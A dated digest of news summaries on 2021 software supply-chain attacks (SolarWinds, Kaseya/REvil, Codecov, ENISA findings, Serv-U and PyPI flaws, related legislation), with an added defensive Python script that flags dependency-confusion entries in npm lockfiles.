11 Tactics to prevent supply chain attacks

Even though the SolarWinds breach was the most sophisticated cyberattack in history, there are still defense tactics organizations can implement to significantly strengthen the digital supply chain. These include implementing honeytokens, securing privileged access management, implementing a zero trust architecture, identifying all potential insider threats, and protecting vulnerable resources.

Ref - Upguard

_______________________________________________________________________________________

(Aug 6, 2021)

Protecting Canada's energy supply chains from cyber threats

The Honourable Seamus O'Regan Jr., Minister of Natural Resources, today announced $407,000 in funding for the University of Waterloo to develop an enhanced cybersecurity system to protect Canada's critical energy infrastructure. The innovative hardware assurance system will be developed by the University of Waterloo and can detect compromised parts and devices, ensuring the safety and reliability of Canada's energy delivery by mitigating risks in its supply chain.

Ref - Yahoo 

_______________________________________________________________________________________

(Aug 6, 2021)

Norsk Hydro’s hack highlights the need for supply chain cybersecurity

According to a recent report, when Norsk Hydro was targeted by a cyberattack in 2019, instead of paying the hackers who held their thousands of servers and PCs hostage, the company decided to consult cybersecurity experts to inspect 30,000 employee credentials and get to the root of the attack. The final culprit? An employee had opened an infected email. This approach may have left Norsk Hydro in a better position to fend off future supply-chain hacks, but it still cost the company over $70 million. It also taught them, and can teach other organizations, a valuable lesson: be prepared.


_______________________________________________________________________________________

(Aug 5, 2021)

Why you should be worried about your supply chain vendors

Software supply chain attacks target either the source code, update mechanism, or build processes of vendor software. A victim could be compromised through several vectors, including third-party software updates, malware installed on connected devices (for example, external hard drives, cameras, or phones), and application installers.

Ref - Upguard 

_______________________________________________________________________________________

(Aug 5, 2021)

DevOps tools proliferation – A whole new world of vulnerabilities and supply chain attacks

The recent series of supply chain attacks affected tens of thousands of companies. Nowadays, CI/CD pipelines form the backbone of modern-day DevOps operations, and as this trend continues, we cannot ignore the urgency of protecting customers’ development environments from these pervasive attacks.


_______________________________________________________________________________________

(Aug 5, 2021)

Supply chain attacks are destined to escalate

The only way to minimize supply chain attacks is for software platform vendors to fix the underlying technology. International or national governments can't solve the issue; platform vendors have to step in. For Windows, that means tightening up the user privileges that developers' apps run with, so that if an app gets compromised, the malware's impact is reduced.

Ref - DarkReading 

_______________________________________________________________________________________

(Aug 5, 2021)

Supply chain security remains a key puzzle

Malicious actors have successfully exploited DNS vulnerabilities on three major cloud providers, including AWS Route 53. “The root cause of the problem is the non-standard implementation of DNS resolvers that, when coupled with specific unintended edge cases on the DNS service provider’s side, cause major information leakage from internal corporate networks.”

Ref - Toolbox

_______________________________________________________________________________________

(Aug 4, 2021)

Major supply chain attacks in 2021

This year alone, there have been several newsworthy attacks that deserve some attention. Kaseya and SolarWinds have been covered ad nauseam at this point. Instead, we’ll pull together a couple of significant case studies to walk you through what we know now after time has passed and hopefully glean some lessons from them.


_______________________________________________________________________________________

(Aug 4, 2021)

Detecting and managing supply chain cyber risk

To actively manage supply chain risks, recommendations such as using trusted networks, information sharing, scenario planning, and quantification metrics have been broadly accepted by organizations as reputed as the World Economic Forum. These may be true, but don’t solve the problem unless deployed by all stakeholders – and that’s a tall order. A rising tide of improved risk management must start from within.

Ref - TrustWave 

_______________________________________________________________________________________

(Aug 4, 2021)

Supply chain attacks from a managed detection and response perspective

Supply chain attacks are difficult to track because the targeted organizations often do not have full access to what’s going on security-wise with their supply chain partners. This can often be exacerbated by security lapses within the company itself. Even if third-party vendors are known to be trustworthy, security precautions should still be deployed in case there are compromised accounts or even insider threats.

 
_______________________________________________________________________________________

(Aug 4, 2021)

Supply chain attacks, IoT threats on tap for Black Hat 2021

The 2020 SolarWinds attack, in which software updates for the Orion IT management platform were poisoned, brought the idea of supply chain infections into the public light. When combined with the rise in sophisticated ransomware gangs, supply chain attacks could well become the most dangerous threat facing enterprises.


_______________________________________________________________________________________

(Aug 4, 2021)

Protecting SMBs against Kaseya supply chain, zero-day, and ransomware attacks

To breach on-premise Kaseya VSA servers, REvil used a zero-day vulnerability that was in the process of being fixed. The vulnerability had been previously disclosed to Kaseya by security researchers from the Dutch Institute for Vulnerability Disclosure, and Kaseya was validating the patch before rolling it out to customers. However, the REvil ransomware gang was one step ahead of Kaseya and used the vulnerability to carry out their attack.

Ref - Check Point 

_______________________________________________________________________________________

(Aug 4, 2021)

Supply chain attacks and mass compromises are changing vendor relationships

Supply chain attacks can dramatically simplify the work that threat actors have to do around target selection, scanning the attack surface, privilege escalation, and lateral movement; these tasks are often harder, more complex, and more costly in traditional or targeted intrusions.

Ref - SC Magazine 

_______________________________________________________________________________________

(Aug 3, 2021)

Four-fold increase in software supply chain attacks predicted in 2021 – report

The European Union has forecast there will be four times more software supply chain attacks in 2021 than there were in 2020, as cybercriminals shift to larger, cross-border targets. Among the findings, ENISA revealed that around 50% of the supply chain attacks studied were attributed to known APT groups, while 42% were not attributed to a particular source.

Ref - PortSwigger 

_______________________________________________________________________________________

(Aug 3, 2021)

What constitutes a software supply chain attack?

It’s important to remember that dependency hijacking or namespace confusion attacks occur automatically and without relying on a developer making a typographical error. This occurs as soon as a malicious dependency is pulled into the developer’s build. Dismissing these incidents as not a software supply chain issue because they lack a major security outcome isn’t wise.
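As an added example (not part of the original post or of Sonatype's tooling), the following script shows one defensive check for exactly the case described above: it reads an npm lockfile and flags any internal package name that the build resolved from somewhere other than the organisation's private registry, which is how a namespace-confusion pull shows up without any typo on the developer's part. The internal package names, the private registry URL and both lockfile excerpts are constructed for illustration; the script handles both the nested lockfileVersion 1 layout and the flat lockfileVersion 2/3 layout.

```python
"""Dependency-confusion check over an npm lockfile (added example).

A namespace-confusion pull leaves a trace in the lockfile: a package that
should only ever come from the private registry carries a 'resolved' URL
pointing at a public registry. This script walks the lockfile and reports
those entries so the build can be stopped before the code runs.
"""
import json

# Constructed sample values (assumptions for this example, not real names).
INTERNAL_PACKAGES = {"acme-auth-client", "acme-billing-core"}
PRIVATE_REGISTRY = "https://npm.internal.acme.example/"

# Constructed package-lock.json excerpt in the lockfileVersion 2 layout:
# "packages" maps "node_modules/<name>" to metadata with a "resolved" URL.
SAMPLE_LOCKFILE_V2 = json.dumps({
    "name": "acme-portal",
    "lockfileVersion": 2,
    "packages": {
        "": {"name": "acme-portal", "version": "1.0.0"},
        "node_modules/acme-auth-client": {
            "version": "2.3.1",
            "resolved": "https://npm.internal.acme.example/acme-auth-client/-/acme-auth-client-2.3.1.tgz",
        },
        # Same internal name, but fetched from the public registry with an
        # implausibly high version: the shape of a namespace-confusion pull.
        "node_modules/acme-billing-core": {
            "version": "99.0.0",
            "resolved": "https://registry.npmjs.org/acme-billing-core/-/acme-billing-core-99.0.0.tgz",
        },
        "node_modules/lodash": {
            "version": "4.17.21",
            "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
        },
    },
})

# Constructed lockfileVersion 1 excerpt: dependencies are nested maps, so a
# confused package can hide one level down inside a legitimate one.
SAMPLE_LOCKFILE_V1 = json.dumps({
    "lockfileVersion": 1,
    "dependencies": {
        "acme-auth-client": {
            "version": "2.3.1",
            "resolved": "https://npm.internal.acme.example/acme-auth-client/-/acme-auth-client-2.3.1.tgz",
            "dependencies": {
                "acme-billing-core": {
                    "version": "99.0.0",
                    "resolved": "https://registry.npmjs.org/acme-billing-core/-/acme-billing-core-99.0.0.tgz",
                },
            },
        },
    },
})


def iter_lock_entries(lock):
    """Yield (package_name, metadata) for every package in a v1 or v2/v3 lockfile."""
    packages = lock.get("packages")
    if packages is not None:
        # v2/v3: keys are install paths; the leaf after the last
        # 'node_modules/' is the package name (scoped names keep their '@scope/').
        for path, meta in packages.items():
            if path:  # "" is the root project itself
                yield path.split("node_modules/")[-1], meta
        return
    # v1: walk the nested "dependencies" maps iteratively.
    stack = [lock.get("dependencies", {})]
    while stack:
        for name, meta in stack.pop().items():
            yield name, meta
            if meta.get("dependencies"):
                stack.append(meta["dependencies"])


def find_confused_dependencies(lockfile_text, internal_names, private_registry):
    """Return [(name, version, resolved)] for internal packages not fetched
    from the private registry. An entry with no 'resolved' URL is reported
    too, because its origin cannot be verified."""
    lock = json.loads(lockfile_text)
    findings = []
    for name, meta in iter_lock_entries(lock):
        if name not in internal_names:
            continue
        resolved = meta.get("resolved", "")
        if not resolved.startswith(private_registry):
            findings.append((name, meta.get("version", "?"), resolved or "<unresolved>"))
    return findings


if __name__ == "__main__":
    for label, text in (("v2", SAMPLE_LOCKFILE_V2), ("v1", SAMPLE_LOCKFILE_V1)):
        for name, version, resolved in find_confused_dependencies(
                text, INTERNAL_PACKAGES, PRIVATE_REGISTRY):
            print(f"[{label}] WARNING: internal package {name}@{version} "
                  f"resolved from {resolved}")
```

Running this against a real lockfile in CI and failing the build on any finding turns the "automatic" pull into a blocked one.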

Ref - SonaType 

_______________________________________________________________________________________

(Aug 3, 2021)

Supply chain attacks are getting worse, and you are not ready for them

The European Union Agency for Cybersecurity (ENISA) has analyzed 24 recent software supply chain attacks and concluded that strong security protection is no longer enough. It notes that 11 of the supply chain attacks were conducted by known APT groups. ENISA focuses on APT supply chain attacks and notes that while the code, exploits, and malware were not considered "advanced", the planning, staging, and execution were complex tasks.

Ref - ZDNet 

_______________________________________________________________________________________

(Aug 3, 2021)

Constant review of third-party security is critical as ransomware threat climbs

Lulled into complacency, businesses face risks of supply chain attacks even after they have done their due diligence in assessing their third-party suppliers' security posture before establishing a partnership. There is a need for continuous review of all touchpoints across their supply chain, especially those involving critical systems and data.

Ref - ZDNet

_______________________________________________________________________________________

(Aug 2, 2021)

CISA announces renewal of the ICT supply chain risk management task force

CISA has announced the extension of the Information and Communications Technology (ICT) Supply Chain Risk Management (SCRM) Task Force to July 31, 2023. The Task Force, chaired by CISA and the IT and Communications Sector Coordinating Councils, is a public-private partnership composed of a diverse range of representatives from large and small private sector organizations charged with identifying challenges and devising workable solutions and recommendations for managing risks to the global ICT supply chain.

Ref - CISA

_______________________________________________________________________________________

(Aug 2, 2021)

PyPI Python package repository patches critical supply chain flaw

The maintainers of Python Package Index (PyPI) last week issued fixes for three vulnerabilities, one among which could be abused to achieve arbitrary code execution and take full control of the official third-party software repository. The security weaknesses were discovered and reported by Japanese security researcher RyotaK.

 
_______________________________________________________________________________________

(Aug 2, 2021)

Today’s supply chain attacks are changing enterprise security

Analysis of several recent examples of supply chain attacks shows that adversaries are often either manipulating code signing procedures via compromised but legitimate signing certificates, hijacking the update distribution network of an ISV solution, or compromising original source code. The majority of the attackers have a high sophistication level, with the exception of the recent Kaseya attack, which leveraged an external-facing service with known vulnerabilities.

Ref - SentinelOne 

_______________________________________________________________________________________

(Aug 2, 2021)

The supply chain effect in an increasingly connected world

Larger supply chains are a consequence of our increasingly connected world, and feature in almost every industry from vehicle manufacturing to dairy companies. Supply chain disruptions and cyber-attacks that propagate through vendor-customer relations show that there are plenty of concerns due to the lack of accounting for the increasingly complex interconnected systems that make up our society.

Ref - Medium

_______________________________________________________________________________________

(Aug 2, 2021)

Supply chain cyber attacks expected to quadruple, says EU agency

The European Union Agency for Cybersecurity (ENISA) has found that 66 percent of supply chain attacks focus on the supplier’s code. ENISA says strong security protection is no longer enough for organizations when attackers have already shifted their attention to suppliers. This is evidenced by the increasing impact of these attacks such as downtime of systems, monetary loss and reputational damage.


_______________________________________________________________________________________

(August 1, 2021)

Top US prosecutors hit by suspected Russian hack

The attack on users of the software SolarWinds - which the US has blamed on Russia - was the worst-ever cyber-espionage attack on the US government. The department says 27 US attorneys had at least one office computer hacked. That has raised fears the hackers may have accessed sensitive information, including the names of informants.

Ref - BBC

_______________________________________________________________________________________

(July 31, 2021)

Organizations should validate third-party code before using it - Euro body

Half of the publicly reported supply-chain attacks were carried out by well-known APT groups, according to an analysis by EU infosec agency ENISA, which warned that such digital assaults need to drive new protective methods. Of the 24 supply-chain attacks studied by ENISA since January 2020, a dozen were attributed to APTs while 10 of them hadn't been attributed to anyone at all in open-source reporting, the agency said.

Ref - The Register 

_______________________________________________________________________________________

(July 30, 2021)

Ransomware exploits and supply chain attacks lead the cyber trends in H1 2021

Global cyber attacks increased by 29%, as hackers continue to exploit the COVID-19 pandemic and shift to remote work. The well-known SolarWinds supply chain attack stands out in 2021 due to its scale and influence, but other sophisticated supply chain attacks have occurred such as Codecov in April, and most recently, Kaseya.

Ref - Check Point 

_______________________________________________________________________________________

(July 30, 2021)

There is no silver bullet for ransomware or supply chain attacks

Aaron Portnoy, the principal scientist at attack surface management specialists Randori, confesses to periodic bouts of imposter syndrome, despite having carved out a distinguished career in offensive security. According to him, the industry is witnessing dramatic changes, and there is a need for some change of approach for keeping pace with increasingly sophisticated attackers.

Ref - PortSwigger 

_______________________________________________________________________________________

(July 30, 2021)

Providers with robust cybersecurity programs also struggling with supply chain problems

According to a recent industry report, less than a quarter of hospitals, accountable care organizations (ACOs), and other healthcare providers demonstrated acceptable conformance with established framework standards. Provider organizations’ primary shortcoming in this area was their ability to validate whether their third-party suppliers and other partners are in line with their contractual security obligations.


_______________________________________________________________________________________

(July 30, 2021)

House committee approves K-12 cyber, DHS supply chain bills

The House Committee on Homeland Security approved two cybersecurity-focused bills – the K-12 Cybersecurity Act and the DHS Software Supply Chain Risk Management Act of 2021 – during a markup on July 28. The DHS Software Supply Chain Risk Management Act of 2021 aims to protect the Department of Homeland Security’s (DHS) networks from cyberattacks by modernizing how the Department procures information and communications technology or services (ICT(S)).

Ref - MeriTalk

_______________________________________________________________________________________

(July 29, 2021)

Ransomware exploits and supply chain attacks lead the cyber trends 2021

The well-known SolarWinds supply chain attack stands out in 2021 due to its scale and influence, but other sophisticated supply chain attacks have occurred such as Codecov in April, and most recently, Kaseya. CPR also identified security flaws that would have allowed an attacker to get access to the Atlassian Jira bug system, with just one click, and get sensitive information, such as security issues on Atlassian cloud, Bitbucket, and on-premise products.

Ref - Check Point 

_______________________________________________________________________________________

(July 29, 2021)

Key recommendations to protect yourself from supply chain attacks

Before a decision to use a supplier is made, a full risk assessment is suggested if resources are available. You can meet the supplier's security manager or CISO, evaluate the supplier's IT resources, and ask suppliers how they prioritize risk. With this, you will get the ability to identify the risks associated with a particular supplier.


_______________________________________________________________________________________

(July 29, 2021)

Understanding the increase in supply chain security attacks

According to the new ENISA report - Threat Landscape for Supply Chain Attacks, which analyzed 24 recent attacks, strong security protection is no longer enough for organizations when attackers have already shifted their attention to suppliers. This is evidenced by the increasing impact of these attacks such as downtime of systems, monetary loss, and reputational damage.


_______________________________________________________________________________________

(July 29, 2021)

Supply chain security affects organizations everywhere

Supply chains offer cybercriminals a single point of failure and multiple attack paths to exploit. Often, attackers look for a smaller organization with fewer or laxer security measures that is part of the supply chain as an entry point. They then get access to the entire network, and the ripple effect means catastrophic consequences.


_______________________________________________________________________________________

(July 29, 2021)

The big takeaway from the Kaseya supply chain/ransomware cyberattack

What everyone is learning after every new supply chain attack is that the battlefield on which organizations operate is considerably larger than previously imagined. The effectiveness of these supply chain shocks shows that our enterprises are also individual nodes of a much bigger macro-network. It’s a battlefield so large that drawing up a strategic defense using conventional tools and tactics won’t work.

 
_______________________________________________________________________________________

(July 28, 2021)

Cybersecurity in supply chain management - Key risks to consider

A cybersecurity strategy depends heavily on the steps the supply chain company team takes. These four steps can help the company implement cybersecurity strategies to improve its supply chain risk management approach: fully understand the threat to the supply chain business, assess the cybersecurity measures, improve current measures and treat cybersecurity as an ongoing process.


_______________________________________________________________________________________

(July 28, 2021)

Top officials urge Commerce Department to confront growing cybersecurity risks

U.S. Sens. Roger Wicker, R-Miss., and Maria Cantwell, D-Wash., ranking member and chair of the Senate Committee on Commerce, Science, and Transportation, sent a letter urging Department of Commerce (DOC) Secretary Gina Raimondo to implement and appropriately resource Congressional direction on growing the cybersecurity workforce. According to them, DOC should continue addressing cybersecurity supply chain risk, including by updating and, as appropriate, encouraging the adoption of software supply chain best practices.


_______________________________________________________________________________________

(July 28, 2021)

Where does the SME fit into a supply chain attack?

SMEs like MEDoc and Inbenta are frequently the target of supply chain attacks. Firstly, they are unlikely to have the security resources of the bigger companies they supply, so they are targeted as a stepping stone for larger attacks against bigger customers. But they are also targeted via their own supply chains. With supply chain attacks being a major growth area for cybercriminals, this is a worsening scenario.


_______________________________________________________________________________________

(July 27, 2021)

With software supply chain security, developers have a big role to play

Securing the software supply chain entails knowing exactly what components are being used in the software products, everything that impacts the code as it goes from development to production. This includes having visibility into even the code you didn't write, like open-source or third-party dependencies, or any other artifacts, and being able to prove their provenance.

Ref - Google

_______________________________________________________________________________________

(July 27, 2021)

Kaseya denies ransomware payment as it hails ‘100% effective’ decryption tool

Kaseya has denied rumors that it paid a ransom to the REvil cybercrime gang as it continues to roll out a decryptor to victims of a recent ransomware attack. The update sparked speculation as to the identity of the unnamed third party, with Allan Liska of Recorded Future’s CSIRT team positing a disgruntled REvil affiliate, the Russian government, or that Kaseya themselves had paid the ransom.

Ref - Portswigger 

_______________________________________________________________________________________

(July 27, 2021)

Protecting the supply chain from Kaseya-like attacks

To protect against Kaseya-like attacks, the end customer should have a solid understanding of their entire software bill of materials (SBOM) and have a regular dialog with its suppliers on current security posture and improvements. Dialog, not dictation, is important here. A component of understanding one’s supplier network is reducing it where possible.

Ref - Medium

_______________________________________________________________________________________

(July 27, 2021)

How network segmentation can protect supply chains from ransomware attacks

Network segmentation has proven helpful in mitigating common ransomware attacks especially those arising from breached IoT devices, third-party vendors, and the like. Part of this has to do with the main benefits of network segmentation. It eliminates network congestion, resulting in overall improved performance, and improves intrusion control by making it easy to contain detected threats. Moreover, it minimizes access to specific sensitive data and information by zoning them to a more secure network.


_______________________________________________________________________________________

(July 26, 2021)

Why code signing best practices are vital to hardening security

Code signing, and the process of establishing and ensuring trust, has become more critical alongside the growing reliance on software that users purchase from third-party vendors and build and deploy within their own organizations using everything from PowerShell and Bash scripts to containers, libraries, files, and executables.

Ref - CPO Magazine 

_______________________________________________________________________________________

(July 26, 2021)

When software updates get hacked

The attack against Kaseya — attributed to the Russia-linked REvil ransomware-as-a-service (RaaS) group — is part of a trend of cybercriminals and espionage operators targeting the suppliers of administrative software used by companies to manage their environments.

Ref - Dark Reading 

_______________________________________________________________________________________

(July 23, 2021)

Supply-chain threats and client-side vulnerabilities

The software supply chain attacks that target applications are growing in large part because the attack surface for these threats has exploded. And that is the result of the latest trends in app development. Evolving client-side app protection technologies are an important factor in reducing cyber risk.

Ref - Barracuda 

_______________________________________________________________________________________

(July 23, 2021)

Kaseya Ransomware attack explained

REvil attacked Kaseya’s VSA SaaS platform using zero-day exploits to gain access and distribute malicious software to their customers and their systems. From there, the ransomware gang began using weaknesses on those systems to encrypt everything. Since the malware is already wrapped in the platform, it’s been signed by Kaseya’s platform. As a result, the malware is getting past everything on these clients’ systems.

Ref - PurpleSec

_______________________________________________________________________________________

(July 23, 2021)

The lessons to be learned from the Colonial Pipeline attack

The Colonial Pipeline attack – coupled with the backlash in the wake of both the SolarWinds and Codecov attacks – has led many to wonder if the executive order is enough. This unease has prompted top executives from firms like Microsoft, Amazon and Cisco to call for an international coalition to combat the global increase in ransomware.

Ref - TechRadar 

_______________________________________________________________________________________

(July 23, 2021)

Kaseya gets master decryptor to help customers still suffering from REvil attack

Kaseya said it has obtained a decryptor that should successfully restore data encrypted during the Fourth of July weekend attack. Kaseya spokeswoman Dana Liedholm described the source of the decryptor as a trusted third party, declining to elaborate or comment on whether a ransom was paid.


_______________________________________________________________________________________

(July 23, 2021)

Getting ahead of supply-chain risks

Supply chains have become so global that this has created new risk in terms of the reliability and availability of certain things. To make sure that these supply chains are properly managed, it’s important to understand where the risk is, get ahead of it, and anticipate security needs and address them before they become problems.

Ref - McKinsey 

_______________________________________________________________________________________

(July 22, 2021)

Tracking the trail of software: The key to boosting security

There is an emerging set of best practices that Google and other software companies have developed in collaboration with the U.S. government to help deliver more secure software. The key is to be able to ensure a ‘certified and known’ good version of the software at any given time, down to the very smallest component code.

Ref - Forbes 

_______________________________________________________________________________________

(July 22, 2021)

DevSecOps: The key to securing supply chain in a multi-cloud threatscape

DevSecOps is all about leveraging your CI/CD platform and containers, increasing testing and scanning across the SDLC, and minimizing manual security measures with AI/ML. Businesses that employ a DevSecOps framework will not only bolster breach prevention, they will add business value as they deliver safer products and services that better protect their businesses and customers.

Ref - InfoQ

_______________________________________________________________________________________

(July 22, 2021)


Things that changed after the SolarWinds attack

One of the most significant impacts of the SolarWinds attack has been that cybersecurity is finally getting the attention it deserves at the highest levels of the U.S. government. It is spurring real changes in policy and actions among the public and private sectors. Organizations must take the lessons learned from this attack seriously and quickly move to improve resiliency and strengthen their own cybersecurity practices.

Ref - Trustwave 

_______________________________________________________________________________________

(July 22, 2021)

Who is responsible for improving security in the software development environment?

Venafi announced the findings of a global survey that evaluates the impact of software supply chain attacks like SolarWinds/SUNBURST, CodeCov, and Kaseya/REvil on how development organizations are changing their approach to securing software build and delivery environments.


_______________________________________________________________________________________

(July 21, 2021)


New bill would make some companies report cyberattacks to the government

A new bill unveiled Wednesday would make some companies tell the government when they’ve been hacked. The bipartisan Cyber Incident Notification Act is a response to the recent attacks on SolarWinds, which impacted government agencies, and Colonial Pipeline, which disrupted access to fuel across a large region of the country. Since then, ransomware attacks — where hackers encrypt files until a victim pays a ransom — have proliferated.

Ref - CNBC 

_______________________________________________________________________________________

(July 21, 2021)

Following SolarWinds & Colonial hacks, a new Bipartisan Cyber Reporting Bill introduced

A new bipartisan Cyber Incident Notification Act of 2021 would require federal government agencies, federal contractors, and critical infrastructure operators to notify the Department of Homeland Security’s (DHS) Cybersecurity and Infrastructure Security Agency (CISA) when a breach is detected. With this, the U.S. government can mobilize to protect critical industries across the country.

Ref - Senate.gov 

_______________________________________________________________________________________

(July 21, 2021)

A risk management cybersecurity imperative for State, Local & Tribal Governments

The cyber-attack using the SolarWinds vulnerability raised alarms throughout the federal government, as data on many agency networks was presumably compromised. The extent of the damage from SolarWinds (and other recent breaches) is still being investigated and mitigated. The cyber breach not only impacted federal systems, but also state, local, and Tribal government (SLTG) systems and databases.

Ref - Forbes 

_______________________________________________________________________________________

(July 20, 2021)

Why securing against IT supply chain attacks is crucial

Given the prevalence of the software being targeted in the supply chain attacks, it’s more about securing any company’s internal environment from supply chain attacks, rather than securing the supply chain itself. As attacks against these building blocks increasingly become a key part of threat actors’ playbook, taking proper steps to secure the enterprise’s IT supply chain is crucial to maintaining an effective cybersecurity program.

Ref - Medium 

_______________________________________________________________________________________

(July 20, 2021)

Top 5 things to know about supply chain attacks

There are 5 key things to know about supply chain attacks. Such an attack doesn’t hit the victim directly; it targets the victim’s suppliers. It can affect almost any industry, including financial, energy, manufacturing, and transportation. It may or may not involve hardware or the internet. Attackers often try to compromise open source development or distribution to gain a foothold in companies. Moreover, there are several possible ways to safeguard against such threats.

Ref - TechRepublic 

_______________________________________________________________________________________

(July 19, 2021)


How to prevent supply chain attacks by securing DevOps

With threat actors focusing more intently on supply chain attacks, building security into the development process becomes mission-critical. Software developers need to embrace DevSecOps to prevent their applications from being used in a supply chain attack. They can do this by creating standards that ensure coding best practices, especially when third-party code is involved.


_______________________________________________________________________________________

(July 19, 2021)

Biden Administration blames hackers tied to China for Microsoft cyberattack spree

The Biden administration publicly blamed hackers affiliated with China’s main intelligence service for a far-reaching cyberattack on Microsoft Corp. email software this year, part of a global effort by dozens of nations to condemn Beijing’s malicious cyber activities. The U.S. government has high confidence that hackers tied to the Ministry of State Security, or MSS, carried out the unusually indiscriminate hack of Microsoft Exchange Server software that emerged in March, senior officials said.


_______________________________________________________________________________________

(July 19, 2021)

Breaking down the threat of going all-in with Microsoft security

Recent cyber events over the last several months have highlighted a critical need for enterprises to break free from depending on one vendor for security in order to limit risk. A ship with an unsegmented hull is prone to sinking very quickly when damaged. On the other hand, companies that segment their security infrastructure across multiple vendors are like ships with several compartments: when one area is compromised, the whole ship isn't immediately exposed.

Ref - Darkreading 

_______________________________________________________________________________________

(July 19, 2021)

Kaseya ransomware attack FAQ

According to Kaseya CEO Fred Voccola, less than 0.1% of the company's customers were embroiled in the breach -- but as their clientele includes MSPs, this means that smaller businesses have also been caught up in the incident. Present estimates suggest that 800 to 1500 small to medium-sized companies may have experienced a ransomware compromise through their MSP.

Ref - ZDNet 

_______________________________________________________________________________________

(July 18, 2021)

Password attacks on Microsoft highlight the need for Passwordless Zero Trust Systems

President Biden, the National Security Agency, and the Department of Defense have all made major public statements encouraging companies to move from traditional perimeter defense-based systems to Zero Trust systems. The policy is shifting for federal contractors such that Zero Trust is quickly becoming not just an option, but the regulation standard. Other industries must follow suit to protect their financial interests, intellectual property, and reputations.


_______________________________________________________________________________________

(July 17, 2021)

Cloudflare CDNJS bug could have led to widespread supply-chain attacks

Web infrastructure and website security company Cloudflare last month fixed a critical vulnerability in its CDNJS library that's used by 12.7% of all websites on the internet. The weakness concerned an issue in the CDNJS library update server that could potentially allow an attacker to execute arbitrary commands, leading to a complete compromise.


_______________________________________________________________________________________

(July 16, 2021)

Several security pros not confident about supply chain attack security - Report

According to a new report from machine identity management firm Venafi, many security pros aren't confident they could repel a major supply chain attack. Polling more than 1,000 information security professionals, developers, and executives in the IT and software development industries for the report, Venafi found that almost half (48%) believe security teams are responsible, with exactly the same percentage saying their development teams are responsible.


_______________________________________________________________________________________

(July 16, 2021)

Kaseya attack - How to fight this unique attack technique

The Kaseya attack is different from other usual ransomware attacks. It started with a zero-day, and that's unusual. It's hard to name a best practice that would have avoided this; moreover, the companies that were infected were following best practices. There were some mistakes, such as the platform being used shouldn't have been exposed to the internet. It was mostly exposed so that people could work remotely because of the pandemic and to increase online availability. And it looks like there was an overuse of what are called endpoint protection exclusions.


_______________________________________________________________________________________

(July 15, 2021)

With software supply chain attacks escalating, who is responsible for increasing security?

According to Venafi’s survey, respondents nearly unanimously agree (97%) that the techniques and procedures used to attack the SolarWinds software development environment will be reused in new attacks this year. Despite this certainty, there is no alignment between security and development teams on which team should be responsible for improving security in the software build and distribution environments.

Ref - Yahoo

_______________________________________________________________________________________

(July 15, 2021)

iOS zero-day let SolarWinds hackers compromise fully updated iPhones

The Russian state hackers who orchestrated the SolarWinds supply chain attack last year exploited an iOS zero-day as part of a separate malicious email campaign aimed at stealing Web authentication credentials from Western European governments. Attacks targeting CVE-2021-1879, as the zero-day is tracked, redirected users to domains that installed malicious payloads on fully updated iPhones.

Ref - ARS Technica 

_______________________________________________________________________________________

(July 14, 2021)

Targeted attack activity heightens need for firms to patch new SolarWinds flaw

Organizations that have not yet patched against a critical remote code execution vulnerability disclosed this week in SolarWinds' Serv-U file transfer technology for Windows might want to do so quickly. Microsoft is presently tracking the attacker as DEV-0322. The group has used commercial VPN technologies and compromised consumer routers in previous attack activities.

Ref - Darkreading 

_______________________________________________________________________________________

(July 13, 2021)

Microsoft discovers threat actor targeting SolarWinds software

Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.

Ref - Microsoft

_______________________________________________________________________________________

(July 13, 2021)

Identity administration platform may be the weak link post-RMM supply-chain attack

Recent ransomware attacks that used a compromised Remote Monitoring and Management (RMM) platform to access endpoints and push malicious executables to them are forcing security teams to re-evaluate such centralized platforms, which have a very large blast radius. These issues have again shown the need for organizations to move to infrastructure designed with Zero Trust principles in mind.

Ref - Medium

_______________________________________________________________________________________

(July 13, 2021)

Microsoft discovers critical SolarWinds zero-day under active attack

An attacker can gain privileged access to exploited machines hosting Serv-U products and could then install programs; view, change or delete data; or run programs on the affected system. The vulnerability exists in the latest Serv-U version 15.2.3 HF1, released on May 5, and all prior versions.

Ref - ARS Technica 

_______________________________________________________________________________________

(July 12, 2021)

SolarWinds patches critical Serv-U vulnerability exploited in the wild

SolarWinds is urging customers to patch a Serv-U remote code execution vulnerability exploited in the wild. According to SolarWinds, "if SSH is not enabled in the environment, the vulnerability does not exist." SolarWinds has addressed the security vulnerability reported by Microsoft with the release of Serv-U version 15.2.3 hotfix (HF) 2.


_______________________________________________________________________________________

(July 12, 2021)

SolarWinds confirms new zero-day flaw under attack

In a recent advisory, SolarWinds said a single threat actor exploited security flaws in its Serv-U Managed File Transfer and Serv-U Secure FTP products against a limited, targeted set of customers. This zero-day is new and completely unrelated to the SUNBURST supply chain attacks.

Ref - SecurityWeek 

_______________________________________________________________________________________

(July 11, 2021)

JustTech and its clients impacted in Kaseya supply-chain ransomware attack

JustTech disclosed that the company and its clients were victims of the recent cyber-attack that has been reportedly attributed to a criminal gang in Russia known as REvil. For JustTech, it is believed the cyber-attack began at 12:31 PM Eastern Standard Time on Friday, July 2nd. JustTech discovered the breach, disabled, and shut down the affected servers within 8 minutes.

Ref - JustTech 

_______________________________________________________________________________________

(July 9, 2021)

Securing the supply chain: Lessons learned from the Codecov compromise

Rapid7 researchers provided the security community with defensive knowledge and techniques to protect against supply chain attacks involving continuous integration (CI) systems, such as Jenkins, Bamboo, etc., and version control systems, such as GitHub, GitLab, etc. It covers prevention techniques — for software suppliers and consumers — as well as detection and response techniques in the form of a playbook.

Ref - Rapid7
 
_______________________________________________________________________________________

(July 9, 2021)

SolarWinds Serv-U remote memory escape vulnerability

SolarWinds was recently notified by Microsoft of a security vulnerability (CVE-2021-35211) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and has developed a hotfix to resolve this vulnerability. Microsoft’s research indicates that exploitation of this vulnerability involves a limited, targeted set of customers and a single threat actor.

Ref - Solarwinds 

_______________________________________________________________________________________

(July 8, 2021)

Kaseya left its customer portal vulnerable to a 2015 flaw in its own software

On July 3, security incident response firm Mandiant notified Kaseya that its billing and customer support site, portal.kaseya.net, was vulnerable to CVE-2015-2862, a “directory traversal” vulnerability in Kaseya VSA that allows remote users to read any files on the server using nothing more than a Web browser. As its name suggests, CVE-2015-2862 was issued in July 2015. Six years later, Kaseya’s customer portal was still exposed to the data-leaking weakness.


_______________________________________________________________________________________

(July 8, 2021)

